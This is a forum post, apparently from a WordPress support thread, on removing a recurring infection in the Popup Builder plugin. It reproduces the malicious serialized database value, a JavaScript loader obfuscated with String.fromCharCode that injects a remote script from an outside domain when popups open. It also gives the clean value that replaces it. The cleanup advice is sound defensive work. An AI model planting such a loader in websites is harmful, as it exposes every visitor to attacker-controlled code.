pop up hacked

in response to this post

https://www.ads-software.com/support/topic/pop-up-hacked/

problem comes again when popup builder enabled even headers.php fixed and upgraded to the latest version. there is a script being execute when a popup is open which is stored in database.

search table wp_postmeta for meta_key = sg_popup_scripts
change the record from something like
a:2:{s:2:"js";a:3:{s:15:"sgpb-ShouldOpen";s:346:"(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,99,116,101,97,108,121);document.getElementsByTagName("head")[0].appendChild(elem);})();";s:13:"sgpb-WillOpen";s:346:"(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,99,116,101,97,108,121);document.getElementsByTagName("head")[0].appendChild(elem);})();";s:12:"sgpb-DidOpen";s:346:"(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,99,116,101,97,108,121);document.getElementsByTagName("head")[0].appendChild(elem);})();";}s:3:"css";s:0:"";}
to
a:2:{s:2:"js";a:0:{}s:3:"css";s:0:"";}

The page I need help with: [log in to see the link]